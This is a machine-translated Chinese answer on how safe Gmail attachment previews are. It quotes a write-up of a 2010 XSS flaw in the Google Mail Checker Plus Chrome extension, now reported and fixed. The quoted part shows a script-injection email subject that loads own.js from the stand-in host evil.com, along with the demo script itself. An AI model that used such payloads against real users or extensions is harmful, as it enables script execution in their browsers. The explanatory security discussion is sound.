它将防止对您用于正常打开附件的应用程序（例如 Adob​​e 阅读器、图像查看器等）的任何独特漏洞进行任何利用。

由于呈现附件，它不会阻止利用浏览器中的漏洞（尽管这很难，因为攻击者必须创建一个与 Google 正在使用的预览器的特定实现一起工作的浏览器漏洞）。

它不会阻止利用与预览器和您的常用应用程序共享的任何算法或库中的漏洞。然而，对于预览版，攻击者再次需要以特定方式制作附件，不仅要利用库，还要让这个利用程序生成适当的浏览器利用程序。浏览器漏洞可以采用简单的攻击向量的形式，例如 XSS 攻击，这将更容易实现。

当您在 Gmail 上使用预览模式打开附件时（如果我可以这样说的话），您会更安全，因为它只是附件的图像；您可以将此图像想象为屏幕截图，我的意思是这样打开文档会使您更安全，因为它不包含原始文档的功能：

但是， Google Mail Checker Plus扩展提供了类似的功能，它在您描述的弹出窗口中预览文件。以这种方式预览文件不会使您面临风险，就像在上面描述的功能中一样，但是（反映@shroeder 对您的问题的评论的案例）我向您复制了一个过去被利用的漏洞示例，允许XSS 攻击：

让我们看看名为“Google Mail Checker Plus”[#] 的流行（每周安装 18,368 次）扩展。此扩展仅显示您的 Gmail 收件箱中未读邮件的数量，可以预览邮件并支持桌面通知。

.. 图:: http://oxdef.info/papers/ext/img/google_mail_checker_plus.png

Mail preview in popup of Google Mail Checker Plus

在预览中，我们至少可以看到主题、出处和正文。好的，让我们发送给我们的自信，主题如下：::

2"'><script src="http://evil.com/own.js"></script>

own.js 是简单的 javascript 演示负载：::

document.body.innerHTML = '';
img = new Image();
img.src = 'http://evil.com/stallowned.jpg';
document.body.appendChild(img);

首先，我们看到这样的通知：

.. 图:: http://oxdef.info/papers/ext/img/gmail_checker_xss_notificate.png

XSS in Google Mail Checker Plus notification part

第二次我们点击扩展的图标并在弹出窗口中查看我们工作的有效负载：

..图：： http: //oxdef.info/papers/ext/img/gmail_checker_xss.png

XSS in Google Mail Checker Plus 

有用！顺便说一下，这个 XSS 已经在 2010 年 6 月 3 日被 Lostmon 报告，并且可以使用固定版本的扩展。Lostmon 写道：“所有扩展程序都运行在他的来源上，无法更改扩展程序中的数据或获取敏感数据，例如电子邮件帐户或密码等。”

让我们在此扩展的上下文中发现此 Web 漏洞以了解风险。

.. [#] https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe .. _reported： http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss 。 html .. _notifications： http ://www.html5rocks.com/tutorials/notifications/quick/